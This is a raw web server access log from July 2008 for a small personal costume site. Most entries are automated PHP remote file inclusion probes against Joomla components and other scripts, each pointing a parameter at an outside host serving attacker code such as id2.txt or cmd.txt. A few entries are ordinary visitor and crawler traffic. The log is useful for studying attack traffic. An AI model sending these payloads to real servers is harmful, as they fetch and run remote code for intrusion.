189.102.16.28 - - [31/Jul/2008:03:38:27 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:03:38:28 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.808"
87.106.191.163 - - [31/Jul/2008:03:39:05 -0500] "GET /logs/errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.191.163 - - [31/Jul/2008:03:39:06 -0500] "GET /errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.162.125 - - [31/Jul/2008:03:40:52 -0500] "GET /logs/access_log.1189036800/index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.44.234.103 - - [31/Jul/2008:03:41:00 -0500] "GET /logs/access_log.1214438400//postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:41:00 -0500] "GET //postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:41:00 -0500] "GET /logs//postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
87.106.22.71 - - [31/Jul/2008:03:41:50 -0500] "GET /logs/access_log.1189036800/index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
201.130.79.130 - - [31/Jul/2008:03:42:38 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:03:42:38 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:03:42:38 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
207.44.234.103 - - [31/Jul/2008:03:43:08 -0500] "GET /logs/access_log.1212883200//postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
72.9.248.162 - - [31/Jul/2008:03:43:57 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://satitlegfc.com/components/v6id.txt???? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
72.9.248.162 - - [31/Jul/2008:03:43:57 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://satitlegfc.com/components/v6id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
72.9.248.162 - - [31/Jul/2008:03:43:58 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://satitlegfc.com/components/v6id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
210.127.253.161 - - [31/Jul/2008:03:46:23 -0500] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
76.178.163.82 - - [31/Jul/2008:03:48:36 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:37 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:37 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:37 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:41 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
76.178.163.82 - - [31/Jul/2008:03:48:53 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
207.44.234.103 - - [31/Jul/2008:03:50:56 -0500] "GET /logs/access_log.1212883200/index.php?basepath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:50:56 -0500] "GET /index.php?basepath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:50:56 -0500] "GET /logs/index.php?basepath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
83.223.15.168 - - [31/Jul/2008:03:51:28 -0500] "GET /logs/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.223.15.168 - - [31/Jul/2008:03:51:28 -0500] "GET /errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.44.234.103 - - [31/Jul/2008:03:52:22 -0500] "GET /logs/access_log.1213315200/send_reminders.php?noSet=0&includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:52:22 -0500] "GET /send_reminders.php?noSet=0&includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:52:22 -0500] "GET /logs/send_reminders.php?noSet=0&includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:54:09 -0500] "GET /logs/access_log.1213315200/get_events.php?includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:54:09 -0500] "GET /get_events.php?includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
207.44.234.103 - - [31/Jul/2008:03:54:09 -0500] "GET /logs/get_events.php?includedir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
201.36.250.17 - - [31/Jul/2008:03:56:35 -0500] "GET /logs/access_log.1186099200/index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.800"
201.36.250.17 - - [31/Jul/2008:03:56:36 -0500] "GET /index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
201.36.250.17 - - [31/Jul/2008:03:56:36 -0500] "GET /logs/index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
77.87.191.61 - - [31/Jul/2008:04:01:53 -0500] "GET /errors.php?error=http://perevorot.org/cache/tits.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
77.87.191.61 - - [31/Jul/2008:04:01:53 -0500] "GET /logs/errors.php?error=http://perevorot.org/cache/tits.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
201.36.250.17 - - [31/Jul/2008:04:03:06 -0500] "GET /logs/access_log.1189036800/index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.800"
77.221.130.16 - - [31/Jul/2008:04:05:50 -0500] "GET /logs/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.221.130.16 - - [31/Jul/2008:04:05:50 -0500] "GET /errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
79.98.23.1 - - [31/Jul/2008:04:09:44 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
79.98.23.1 - - [31/Jul/2008:04:09:44 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
207.44.234.103 - - [31/Jul/2008:04:11:48 -0500] "GET /logs/access_log.1213315200/index.php?basepath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
85.17.162.125 - - [31/Jul/2008:04:12:46 -0500] "GET /index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.106.22.71 - - [31/Jul/2008:04:13:01 -0500] "GET /index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.124.127.40 - - [31/Jul/2008:04:13:09 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
121.124.127.40 - - [31/Jul/2008:04:13:10 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
121.124.127.40 - - [31/Jul/2008:04:13:10 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
210.127.253.161 - - [31/Jul/2008:04:14:23 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:04:14:23 -0500] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:04:14:24 -0500] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
121.124.127.40 - - [31/Jul/2008:04:15:39 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
121.124.127.40 - - [31/Jul/2008:04:15:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
121.124.127.40 - - [31/Jul/2008:04:15:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://incarnate-network.eu//images/smilies/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
213.191.144.10 - - [31/Jul/2008:04:16:31 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
213.191.144.10 - - [31/Jul/2008:04:16:31 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
210.127.253.161 - - [31/Jul/2008:04:17:27 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:04:17:32 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.58.128.249 - - [31/Jul/2008:04:18:15 -0500] "GET /logs/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.53.89.162 - - [31/Jul/2008:04:18:15 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.89.162 - - [31/Jul/2008:04:18:15 -0500] "GET /logs/access_log.1216512000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.89.162 - - [31/Jul/2008:04:18:15 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.58.128.249 - - [31/Jul/2008:04:18:15 -0500] "GET /send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.53.89.162 - - [31/Jul/2008:04:18:20 -0500] "GET /logs/access_log.1212537600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.72.112.142 - - [31/Jul/2008:04:19:08 -0500] "GET /logs/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
64.72.112.142 - - [31/Jul/2008:04:19:08 -0500] "GET /send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
70.84.182.98 - - [31/Jul/2008:04:19:16 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:19:16 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
80.67.26.157 - - [31/Jul/2008:04:19:49 -0500] "GET /logs//errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:04:19:49 -0500] "GET //errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:04:19:56 -0500] "GET /logs//errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:04:19:56 -0500] "GET //errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
70.84.182.98 - - [31/Jul/2008:04:20:10 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:20:11 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
74.53.89.162 - - [31/Jul/2008:04:20:36 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
89.255.60.6 - - [31/Jul/2008:04:21:05 -0500] "GET /logs/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:04:21:06 -0500] "GET /atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
200.11.67.242 - - [31/Jul/2008:04:22:00 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:22:01 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:22:15 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:22:15 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
74.54.108.98 - - [31/Jul/2008:04:22:51 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:22:51 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:23:02 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:23:02 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
153.19.161.46 - - [31/Jul/2008:04:23:24 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:23:24 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:23:24 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:23:24 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.106.191.163 - - [31/Jul/2008:04:23:56 -0500] "GET /logs/access_log.1212883200/errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.130.79.130 - - [31/Jul/2008:04:24:15 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:15 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:19 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:19 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:32 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:32 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:35 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:24:35 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
83.223.15.168 - - [31/Jul/2008:04:25:11 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:04:26:20 -0500] "GET /logs/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:04:26:20 -0500] "GET /atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.84.182.98 - - [31/Jul/2008:04:27:29 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:27:32 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:27:37 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:27:37 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
153.19.161.46 - - [31/Jul/2008:04:28:23 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:23 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:27 -0500] "GET /logs/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:28 -0500] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:32 -0500] "GET /logs/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:32 -0500] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:39 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:39 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:43 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:28:43 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:29:03 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:04:29:03 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
74.54.108.98 - - [31/Jul/2008:04:29:16 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:29:16 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:29:20 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:29:20 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
74.6.18.231 - - [31/Jul/2008:04:30:32 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.130.79.130 - - [31/Jul/2008:04:31:14 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:31:14 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:31:22 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:31:23 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.6.18.231 - - [31/Jul/2008:04:33:11 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.11.67.242 - - [31/Jul/2008:04:33:12 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:33:18 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
74.54.108.98 - - [31/Jul/2008:04:34:01 -0500] "GET /logs/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:34:01 -0500] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:34:10 -0500] "GET /logs/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.811"
